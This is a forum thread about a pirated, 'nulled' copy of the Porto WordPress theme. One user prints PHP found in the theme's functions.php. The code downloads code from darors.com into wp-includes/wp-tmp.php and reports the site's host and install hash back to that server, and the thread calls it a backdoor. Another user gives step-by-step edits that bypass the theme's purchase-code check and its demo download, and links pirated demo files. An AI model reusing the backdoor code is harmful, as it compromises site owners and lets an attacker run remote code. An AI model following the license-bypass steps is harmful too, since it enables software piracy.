Porto | Best Multipurpose & WooCommerce Themes For WordPress v7.4.6

danielsm said:

Ok, what i mean, not adds, sorry, Ads, full of them. like you will see on this attachment. The ads seems to be legit, no malware or something like this, but adblock just block the header content (block) so far .

Click to expand...

CyberDeviL said:

Haven't checked the theme yet, but those url's should never exists in any theme by default, check if you've added adsense or any other advertisements to your theme's Ad panel / or via any plugin . . If yes, then you're fine.

Click to expand...

danielsm said:

so... this is what i found so far in this theme, that is very strange:

$wp_auth_key='ac15616a33a4bae1388c29de0202c5e1';
if (($tmpcontent = @file_get_contents("http://www.darors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.darors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}
if ($ping) {
$content = @file_get_contents('http://www.darors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
//@file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.darors.com/admin.txt'));
}

if ($ping2) {
$content = @file_get_contents('http://www.darors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
//@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.darors.com/admin.txt'));
//echo ABSPATH . 'wp-includes/class.wp.php';
}


I dont think that its normlat to exists this script. So i this theme its not safe.

so, the file function.php is populate with this thing after the theme is installed....
ok, so now, we have a backdoor + ads

Click to expand...

CyberDeviL said:

I'll install the theme - will give feedback then . .

Click to expand...

Tomz said:

how to null porto theme!
No, this no longer works - the theme now requires legit key to get the demos.
Here are all the demos from 4.7.2 http://uploadboy.me/iy92cryemg7c/
To null the theme, in the file inc/admin/admin.php find the function check_purchase_code Line 91 and after line 91 add this code:

PHP:

return "verified";

Now use any key to activate the theme.

Upload the demo zips (not the single big zip file but the individual demo files) to your WP install wp-content/uploads/porto_demos (you will need to create this folder)

Then in the file porto/inc/plugins/importer/imported-api.php, comment out line 146 Find this

PHP:

$response = wp_remote_get( $url, $args );

and change it to

PHP:

// $response = wp_remote_get( $url, $args );

A few lines later (151) change

JavaScript:

$body = wp_remote_retrieve_body( $response );

to

PHP:

$body = file_get_contents('../wp-content/uploads/porto_demos/' . $this->demo . '.zip');

Now you can install any of the demos.
Please note that you must have installed and activated any plugins necessary for the demo (it will tell you if you are missing a plugin when you go to install the demo)

Proof Images:

Click to expand...

UzMaN said:

hello,
new version 4.11.1 update please

very thanks
best regards

Click to expand...